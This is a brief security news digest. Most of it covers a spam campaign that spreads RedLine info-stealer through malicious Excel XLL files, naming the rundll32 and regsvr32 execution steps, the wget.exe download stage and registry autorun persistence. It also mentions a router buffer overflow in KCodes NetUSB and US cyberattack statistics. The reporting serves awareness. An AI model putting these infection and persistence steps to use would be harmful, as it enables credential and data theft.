BleepingComputer reports that numerous websites are being targeted by a widespread contact form and discussion forum spamming campaign involving the distribution of malicious Excel XLL files that facilitate the installation of the information-stealing RedLine malware.
Aside from exfiltrating web browser-stored usernames and passwords, cookies, and credit cards, the RedLine trojan could also steal FTP credentials and files. The malware also has command execution, screenshot creation, and malware downloading and execution capabilities.
Attackers have been leveraging various lures in spreading RedLine, including advertising requests and gift guides, while some lures involved the creation of fraudulent websites for hosting the malicious Excel XLL file.
Performing manual execution of the DLL using the 'rundll32 name.xll, xlAutoOpen' or regsvr32.exe commands will prompt the extraction of the wget.exe program to the %UserProfile% folder, which will then allow remote installation of the RedLine binary. The RedLine info-stealer will also be automatically launched by a Registry autorun entry when users log into Windows, enabling the theft of sensitive data stored in web browsers.
Millions of Tenda, Netgear, Western Digital, TP-Link, D-Link, and EDiMAX end-user routers are being affected by a high-severity buffer overflow vulnerability in the KCodes NetUSB component, a Linux kernel module allowing local network-connected devices to offer USB-based services.
Thirty-three percent of Americans experienced one or more cyberattacks last year, nearly half of whom were victimized by phishing attacks, as cybersecurity incidents across the U.S. rose by 27%, compared with 2020.